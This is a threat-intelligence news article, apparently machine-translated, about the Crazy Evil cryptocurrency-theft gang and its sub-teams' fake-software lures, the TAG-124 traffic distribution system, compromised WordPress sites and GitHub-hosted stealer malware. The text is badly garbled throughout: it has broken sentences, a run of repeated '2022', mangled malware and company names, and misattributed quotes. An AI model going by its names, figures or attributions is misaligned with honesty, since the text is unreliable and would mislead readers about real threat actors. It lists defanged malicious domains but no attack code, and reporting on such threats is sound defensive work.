Russian -language cyber criminal gang, known as Crazy Evil, uses a wide range of tailored lures to deceive the victims, Stealc, atom Master Tiller (aka AMOS), and more than 10 to install such malware. It is linked to social media fraud. Angel drainer.
“Crazy Evil, which specializes in identity fraud, theft of cryptocurrency, and stealing information, has adopted a network that has been properly adjusted by carriers. We are hiring a social engineering expert who is entrusted to redirect on the page. “
The use of a variety of malware ARSENAL CRYPTOSCAM group indicates that threat actors target both Windows and MacOS systems, which bring risks to distributed finance ecosystems.
Crazy Evil has been evaluated as active since at least 2021, and is mainly in charge of rediring legal traffic to malicious landing pages operated by other criminals. It is functioning as. It is said that @abbrahamCrazyevil is operated by a threat actor known in Telegram. This provides services to more than 4,800 subscribers on the messaging platform (@crazyevilcorp) at the time of writing.
“They will monetize the traffic to these botnet operators, which are intended to infringe on or specifically in the region, or specifically,” said Sekoia, 2022, 2022, 2022, 2022, 2022, 2022, 2022, 2022, 2022, 2022, 2022. I mentioned in a deep dive report about the moon transportation service.
“Therefore, the main issues facing the carrier are to generate high -quality traffic without bots that are detected or analyzed by security vendors and ultimately filtered by traffic type. The activity is one form of lead generation.
Unlike other frauds developed mainly on setup of counterfeit shopping sites to promote unauthorized transactions, Crazy Evil contains inappropriate tokens (NFT), cryptocurrency, payment cards, and online banking accounts. It focuses on theft of assets. It is estimated that it has created an illegal income of more than $ 5 million and has infringed tens of thousands of devices around the world.
Exit scams, including the other two cyber crime group Markopolo and Cryptolove, gained new outstanding.
“Crazy Evil will explicitly sacrifice the cryptocurrency space with a custom -made spear phishing lure,” said Future. “Crazy evil transportation takes a few days or weeks to take a reconnaissance time, may identify goals, and start engagement.”
In addition to adjusting the attack chain that provides information theft and wallet drainers, the group administrator provides a tuffer for malicious payload and a clipper service instruction manual and guidance, and affiliate structure. I claim to be proud.
Crazy Evil is the second cyber criminal group in which Telecopie has been released in recent years, focusing on telegrams. The newly adopted affiliated companies will be supervised by the telegram bot controlled by actors to other private channels-
Payments to announce the revenue of the carbar Logbar are information stiller attacks, providing audit certificates in the stolen data, and regular Trackers Global Chat, which is useful as Main Main, is used. Communication space for discussions from work to Myers when providing management and technical updates
The cyber crime group has been found to consist of six sub -teams, AVLAND, Typed, Deland, Zoomland, Defi, and Kevland. Each is due to a specific fraud that imposes victims to install tools from fake websites.
Avland (Avs | RG or Avenge). This uses recruitment and investment scams to propagate Stealc and Amos Stealers with a web3 communication tool named VOXIUM (“VOXIUMCALLS).[.]com “) Typedized. This is Typerdex (” “Typerdex is propagating Amos Stealer with an artificial intelligence software named[.]ai “) Demeet (” Demeet)[.]App “) Zoomland, Zoom and Wechat (” Utilize the general scams that become “App-WHECHAT)[.]Com “) To propagate Amos Stealer Defi, propagate Amos Stealer in a digital asset management platform named Selenium Finance (” Selenium)[.]Fi “) KEVLAND, Amos Stealer is propagated to Amos Stealer, and GotLaum (” Gatherum) named AI-Hanced Virtual Meeting Software (“Gatherum)[.]Ca “)
“As crazy evil continues to achieve success, other cyber criminal entities are more likely to emulate the method, and the security team has a wide range of violations and trust in cryptocurrencies, games, and software sector. Future, who was forced to keep alerts forever to prevent erosion, “said Future.
This development occurs when cyber security companies have released a traffic distribution system (TDS) called TAG-124. It overlaps with Landupdate808, 404 TDS, Kongtuke, and Chaya_002, known as Chaya_002. RHYSIDA ransomware, interlock ransomware, TA866/ASYLUM Ambuscade, SOCGHOLISH, D3F@CK Loader, and TA582 have shown to use TDS in the first infection sequence.
“The TAG-124 consists of an infringed WordPress site network, actor-controlled payload servers, central servers, suspicious management servers, additional panels, and other components networks.” “If the visitor meets specific standards, the infringed WordPress website will eventually display a fake Google Chrome update landing page that will eventually lead to malware infection.”
The recorded FUTURE also enhances the relationship between RHYSIDA and interlock ransomware stocks by shared use of TAG-124, and recent TAG-124 campaigns have copied the clipboard to visitors. I also noticed that the clickfix technique that instructed to execute is used. Start malware infection.
Part of the payload developed as part of the attack contains Remcos Rat and CleanUploader (also known as Broomstick or Oyster), and the latter functions as RHYSIDA and interlocked rans -wear.
A compromise of over 10,000 WordPress sites has been found to function as a distribution channel of Amos and Socholish as part of the client’s attack.
“JavaScript, loaded on the user’s browser, generates a fake page with IFRAME,” said Himanshu Anand on the C/side. “Attackers use outdated WordPress versions and plugins to make it more difficult to detect websites without client surveillance tools.”
Furthermore, threat actors have been using the trust related to popular platforms such as GitHub to host malicious installers that lead to other payloads such as Lumma Stealer, Sectoprat, Vidar Stealer, Cobalt Strike Beacon. Masu.
Trend Micro activity indicates a tactic and serious duplicate due to a threat actor called Stargazer Goblin, which has a track record of using a GitHub repository in the payload distribution. However, the important difference is that the infected chain starts with an infected website that redirects the malicious GitHub release link.
“The distribution method of Lumma Stealer is evolving, and threat actors are currently hosting malware using GitHub repositories,” said Jobit Samaniego, a security researcher buddy TANCIO, Fe Cureg, and Jobit Samaniego. 。
“The Malware AS-A-Service (MaaS) model provides malicious actors with highly accessible means to achieve complex cyber attacks and achieve malicious goals. Such a distribution of threats. “
Source link
